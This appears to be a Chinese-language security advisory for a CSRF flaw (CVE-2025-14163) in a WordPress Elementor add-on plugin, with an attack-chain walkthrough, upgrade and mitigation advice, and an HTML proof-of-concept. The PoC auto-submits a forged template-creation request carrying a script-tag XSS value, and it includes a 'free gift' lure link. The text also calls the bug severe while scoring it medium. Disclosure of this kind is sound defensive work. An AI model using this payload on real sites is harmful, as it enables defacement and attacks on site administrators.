CVE-2025-14163 WordPress Premium Addons for Elementor CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-14163

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premium Addons for Elementor (WordPress插件)

漏洞概述

Premium Addons for Elementor是WordPress平台上广受欢迎的Elementor页面构建器增强插件，为用户提供额外的小工具和功能。该插件在所有版本直至4.11.53存在一个严重的跨站请求伪造(CSRF)漏洞。由于插件的'insert_inner_template'函数缺少必要的nonce验证机制，攻击者可以构造恶意请求，诱骗网站管理员或具有编辑帖子权限的用户点击特制链接，从而在受害者不知情的情况下创建任意Elementor模板。此漏洞无需攻击者具有任何网站权限，但需要目标用户执行交互操作（如点击链接）。攻击成功后，攻击者可在网站上注入恶意内容，可能导致网站被篡改、SEO作弊、钓鱼攻击或其他恶意活动。由于该插件被广泛使用，此漏洞影响了大量WordPress网站的安全。

技术细节

该CSRF漏洞源于Premium Addons for Elementor插件的insert_inner_template函数未实施CSRF保护机制。具体问题包括：1) 缺少WordPress nonce验证：WordPress提供了wp_verify_nonce()函数用于验证请求来源，但该函数未被调用；2) 缺少权限检查：虽然功能涉及模板创建，但未验证用户是否具有相应权限；3) 无状态验证：未使用WordPress的check_ajax_referer()或类似机制。攻击者可以构造一个包含恶意参数的HTML表单或URL，当具有编辑权限的用户访问时，浏览器会自动携带用户的认证cookie发送请求。WordPress会根据cookie识别用户身份并执行请求，导致攻击者能够以受害者权限创建任意Elementor模板。攻击者可能利用此漏洞注入包含恶意JavaScript的模板，实现存储型XSS攻击，或创建钓鱼页面窃取用户信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的Premium Addons for Elementor插件版本是否低于4.11.54

STEP 2

步骤2

攻击者构造包含恶意参数的CSRF攻击载荷，包含insert_inner_template函数所需的参数

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或恶意网站诱骗网站管理员或具有编辑权限的用户访问攻击载荷

STEP 4

步骤4

受害者浏览器自动发送携带其认证cookie的请求到目标网站的admin-ajax.php

STEP 5

步骤5

WordPress根据cookie识别用户身份，由于缺少nonce验证，执行insert_inner_template函数创建恶意模板

STEP 6

步骤6

攻击者利用创建的恶意模板实现存储型XSS、钓鱼攻击或网站内容篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-14163 -->
<!-- Exploits missing nonce validation in insert_inner_template function -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack - Create Elementor Template</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2025-14163</h1>
    <p>Click the button below to trigger template creation (requires admin interaction)</p>
    
    <!-- Auto-submit form -->
    <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="premium_addons_insert_inner_template">
        <input type="hidden" name="template_name" value="Malicious Template">
        <input type="hidden" name="template_content" value="<script>alert('XSS')</script>">
        <input type="hidden" name="template_type" value="section">
    </form>
    
    <script>
        // Auto-submit after page load
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>Or use this link (social engineering):</p>
    <a href="https://target-site.com/wp-admin/admin-ajax.php?action=premium_addons_insert_inner_template&template_name=Malicious&template_content=<script>alert('XSS')</script>">Click for free gift!</a>
</body>
</html>

影响范围

Premium Addons for Elementor <= 4.11.53 (所有版本)

防御指南

临时缓解措施

立即将Premium Addons for Elementor插件升级到4.11.54或最新版本。如果无法立即升级，可以暂时禁用该插件，或使用WordPress防火墙插件（如Wordfence）提供针对CSRF攻击的额外保护层。同时应对网站管理员进行安全意识培训，提醒不要点击未知来源的链接。